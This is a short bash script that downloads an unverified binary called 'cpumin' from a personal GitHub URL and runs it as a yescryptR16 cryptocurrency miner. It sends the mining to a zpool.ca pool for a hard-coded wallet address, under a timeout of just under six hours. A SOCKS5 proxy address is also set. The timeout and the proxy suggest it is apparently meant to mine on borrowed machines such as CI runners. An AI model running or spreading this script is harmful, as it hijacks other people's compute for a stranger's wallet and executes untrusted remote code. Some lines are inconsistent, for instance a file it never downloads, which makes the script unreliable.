#!/bin/bash
apt update
wget https://raw.githubusercontent.com/jacujamil/dewasa/main/cpumin
apt install screen libjansson4 -y
apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
chmod +x ternak.sh && chmod +x cpumin
screen -dmS ls
A=yescryptR16.sea.mine.zpool.ca:6333
B=RJbpJsvF8N7TXawbENkYLrMvw3NSaJTDc4
C=$(echo $(shuf -i 1-9999 -n 1)-P1)
D=socks5://45.95.96.187:8746
timeout 359m ./cpumin -a yescryptR16 -o $A -u $B.$C -p tes,c=RVN -t 2

